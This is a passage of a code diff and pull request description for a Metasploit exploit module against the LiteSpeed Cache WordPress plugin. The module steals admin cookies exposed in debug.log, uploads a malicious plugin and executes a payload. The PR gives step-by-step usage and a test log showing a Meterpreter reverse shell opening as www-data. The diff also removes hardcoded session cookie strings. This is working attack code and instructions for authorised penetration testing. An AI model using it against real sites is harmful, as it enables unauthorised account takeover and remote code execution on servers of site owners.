+    print_status('Uploading payload...')
 
-    #admin_cookie = "wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726261494%7Cftvy2vH8dTLXjkbZqNg6PU9u7RkI89U1qYfpsvqSPb3%7C8d04a7bea4697a96e4259346dc07654a081597b5484fb91df2a883c72f69f49d; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726261494%7Cftvy2vH8dTLXjkbZqNg6PU9u7RkI89U1qYfpsvqSPb3%7Cb4fb6a316b94520cb51847f71fed25da55d1bcbe8295870dbc6eaa6282654c3b"
-    #admin_cookie = "wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726261494%7Cftvy2vH8dTLXjkbZqNg6PU9u7RkI89U1qYfpsvqSPb3%7C8d04a7bea4697a96e4259346dc07654a081597b5484fb91df2a883c72f69f49d; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726261494%7Cftvy2vH8dTLXjkbZqNg6PU9u7RkI89U1qYfpsvqSPb3%7Cb4fb6a316b94520cb51847f71fed25da55d1bcbe8295870dbc6eaa6282654c3b"
-
-    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)
+    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, @admin_cookie)
     fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
 
     print_status("Executing the payload at #{payload_uri}...")

--- a/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
+++ b/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
@@ -136,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
     raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in')
 
     admin_cookies = extract_cookies(res.body)
-    raise AdminCookieError 'No admin cookies could be found in debug.log' unless admin_cookies
+    raise AdminCookieError, 'No admin cookies could be found in debug.log' if admin_cookies.blank?
 
     print_status('One or more potential admin cookies were found')
 


### PR DESCRIPTION
This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin that currently has around 6 million active installations. In LiteSpeed Cache versions prior to `6.5.0.1`, when the Debug Logging feature is enabled, the plugin will log admin cookies to the `/wp-content/debug.log` endpoint which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default. The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Start msfconsole
- [ ] Do: `use multi/http/wp_litespeed_cookie_theft`
- [ ] Set the `RHOST`, `LHOST` and `RPORT`
- [ ] Run the module
- [ ] Receive a Meterpreter session in the context of the user running the WordPress site.

## Testing
```
msf6 exploit(multi/http/wp_litespeed_cookie_theft) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] One or more potential admin cookies were found
[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/qSNzhabMTP/OiDynMUetY.php...
[*] Sending stage (39927 bytes) to 192.168.1.67
[+] Deleted OiDynMUetY.php
[+] Deleted qSNzhabMTP.php
[+] Deleted ../qSNzhabMTP
[*] Meterpreter session 7 opened (192.168.1.67:4444 -> 192.168.1.67:64935) at 2024-09-11 23:18:14 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 29292f368fe3
OS          : Linux 29292f368fe3 6.10.4-linuxkit #1 SMP PREEMPT_DYNAMIC Mon Aug 12 08:48:58 UTC 2024 x86_64
Meterpreter : php/linux
```
